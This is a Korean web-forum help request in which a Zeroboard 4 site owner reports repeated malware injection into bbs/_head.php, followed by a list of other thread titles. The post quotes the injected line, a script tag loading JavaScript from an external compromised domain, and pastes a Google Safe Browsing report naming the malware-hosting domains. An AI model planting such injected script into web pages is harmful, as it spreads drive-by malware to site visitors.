묻고답하기

인터넷을 많이 뒤져봤는데 뚜렷한 해결책을 못찾아서 여기에 질문을 올려봅니다.
(이미 해결책이 있는데 제가 잘 이해를 못한 것일 수도 있고요)


현재 제로보드4 버전을 사용해서 운영중인 홈페이지가 있습니다.

그런데 계속 악성코드가 삽입되어서 골머리를 썩고 있습니다.


bbs/_head.php 라는 파일의 가장 마지막줄에

<?ob_start();?><script src="http://www.wsart.net/bbs/data/js/common.js></script>

라는 내용이 삽입되어서

_head.php를 인클루드하고 있는 모든 페이지들이

영향을 받고 있습니다.

script태그의 src 내용은 매번 바뀝니다.


구글의 안전브라우징 진단검사는 아래와 같습니다.

Google이 사이트를 방문했을 때의 결과

지난 90일간 진행된 사이트 테스트에서 68개의 페이지 가운데 8개에서 사용자 동의 없이 악성 소프트웨어가 다운로드 및 설치된 것으로 확인되었습니다. Google이 사이트에 마지막으로 방문한 것은 2011-04-10이며, 의심되는 콘텐츠가 마지막으로 발견된 것은 2011-04-10입니다.

Malicious software includes 3 scripting exploit(s), 3 exploit(s). Successful infection resulted in an average of 4 new process(es) on the target machine.

wkmg.co.kr/sporam.com/을(를) 포함한 2개의 도메인에서 악성 소프트웨어를 호스팅하고 있습니다.

interbar.co.kr/을(를) 비롯한 1개의 도메인이 이 사이트 방문자에게 악성코드를 유포하는 중개 역할을 한 것으로 나타났습니다.

This site was hosted on 1 network(s) including AS3786 (ERX).



혹시 이 취약점이 어떤 방식으로 해서 들어오는것인지

그리고 해결법을 알고 계신분 있으신가요???
글쓴이 제목 최종 글
XE 공지 글 쓰기,삭제 운영방식 변경 공지 [16] 2019.03.05 by 남기남
뽀빠이맘 제로보드 xe.1.4.5.2 설치  
누란지세 위젯이 제대로 작동을 안할때는 뭐가 보통 문제죠?ㅠ_ㅠ [1] 2011.04.14 by 수엘다
Pureunsoll 로그인 오류에 대하여 [2] 2011.04.14 by 백성찬
artspace 설치가 안되는데요 [1] 2011.04.14 by 백성찬
케니2 회원확장변수 검색  
참목자 최신 제로보드 사용자입니다.  
참목자 최신 제로보드 사용자입니다.  
박영대 captcha이미지가 x로 나옵니다. [1] 2011.04.14
손동오634 admin 경로 질문이요  
star_key 디지탈 달력이 안맞는데 해결밥법은?  
시우군 확장변수 관리자만 볼수있게 못하나요?  
star_key XE 1452 버전업 후 펍업이 안뜹니다.  
연타이 왼쪽 정렬로 하고싶습니다. [2] 2011.04.14 by 연타이
김진영369 제로보드 xe 메인페이지 레이아웃 서브와 다르게 표시하고 싶어요 [1] 2011.04.14 by 백성찬
연타이 유니코드 질문 드려요 [1] 2011.04.14 by 백성찬
홈페이지 142 이미지 업로드 [1] 2011.04.14 by 백성찬
선셀로셀아이 게시판 내용을 메인화면에서도 부분으로 나오게 하는것은 어떻게 하나요? [2] 2011.04.14 by 김진영369
웅솔몽둥이 XE 게시판 기본스킨 관련 문의입니다.  
꿀ㄹ ftp로 php수정  
왕왕대두 최근게시물 타겟설정(외부페이지) 도움좀 주세요.  
제주촌닭 위젯용 html 수정 문의합니다  
스유군 검정 레이아웃 스킨을 사용중입니다.  
왕왕대두 좀 도와주세요  
쮸야282 게시판의 웹진이나 겔러리 목록에서 이미지가 보이질 않아요  
철갑 exec_xml함수의 기능이 궁금합니다. [1] 2011.04.13 by 카르마
시우군 비회원이 글쓴 본문 닉네임 폰트 수정 어떻게 하나요?  
윤재석859 학습 중 차이점이 있어 문의 드려요.. [2] 2011.04.13 by 츄우양
120money 페이지에 오류가 있습니다 문제..  
klake0 관리자 로그인에서 존재하지 않는 아이디라고 나오는 이유가 뭐죠?  
최상순480 이슈트래커를 모바일버전으로 구현가능할까요?